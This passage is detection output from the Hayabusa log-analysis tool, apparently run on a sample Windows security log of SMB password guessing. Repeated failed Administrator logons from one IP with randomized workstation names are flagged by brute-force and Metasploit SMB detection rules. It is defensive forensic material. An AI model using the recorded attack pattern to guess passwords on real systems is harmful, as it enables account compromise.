NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:28.204 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:28.252 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IB3OSmcFx5TUiiJX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:28.252 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:28.309 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lo3Ex40dkIeO53HF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:28.309 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:28.352 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AkzDG8QOM2cxbokF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:28.352 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:28.395 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YoMf36ZXJBLnYxtc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:28.395 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:28.436 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5izPIefHqDDWNDlu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:28.436 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:28.476 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: z9o4f1XvvcVXBNwL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:28.476 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:28.521 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: IjCR48ZJFyEhzrYI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:28.521 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:28.556 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mUV9i4O2gapcC01d : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:28.556 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:28.608 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XJzGAMQCvJBFOUPq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:28.608 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:28.645 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Fyyu0x6I29R2J10Y : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:28.645 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:28.687 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8lCe1shqSs0xNwAJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:28.687 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:28.728 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ipZAMvm56d5mE9Fc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:28.728 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:28.774 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XX9N7jodTuEYBCSE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:28.774 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:28.814 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: h5DBFGpzfJJ7gYV1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:28.814 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:28.848 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fQ3qTwcWkXJDuXDI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:28.848 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:28.889 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TOfkvLSo2HuhMtvk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:28.889 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:28.940 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: y9DQUhPQHvvwAO0C : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:28.940 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:28.990 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yao1JM0tSFv5IHnL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:28.990 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.037 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NXGm63wiZz3ZYFb9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.037 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.077 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: izvPgZCO2GRVLhId : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.077 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.119 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iI9zO2o7jd922pfK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.119 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.164 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UnAGy86My6hVwt4J : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.164 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.208 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HhFTzONSVEziRtgq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.208 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.251 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QdEv4ooC8AApqU1T : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.251 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.292 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TxFGRBKVK732Aeu4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.292 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.336 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ITg8QH90LKkAQMLL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.336 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.377 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: E8YKCN2uxmJtYxdW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.377 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.411 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lcVIqrTQbNLFW7Cr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.411 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.449 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: taZx68l1ci0i2XB0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.449 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.487 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9Jjy0gZhZCc9dVGd : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.487 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.525 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: S1DxOWcNytmxHfxl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.525 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.555 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JGRFWos3MJeQ0oAr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.555 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.593 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I3YXVTiQAGbf57TH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.593 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.629 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eWNsBwoGd36krY2U : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.629 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.668 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HIobpWCoOHdD76lL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.668 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.704 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: W91ruUEdXwRcMxVB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.704 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.743 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 6PEs7fp97cYFf4vx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.743 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.781 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hQelUX0kwLfpJnr0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.781 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.824 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: t88CBspQqbiO1IPc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.824 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.864 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zELW2Upo3jRCIqJk : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.864 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.900 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QfcyJGLYmu93JBIL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.900 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.940 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3t2nKPZHZvcXM3QA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.940 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.980 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oiDRonqdEM2YJvz9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.980 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:30.012 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wJPF4GUypkDkTz56 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:30.012 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:30.060 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cd5YRVIoXx8LoYpK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:30.060 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:30.106 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: H49I2Xp2Gz1Jj0Wh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:30.106 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:30.143 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
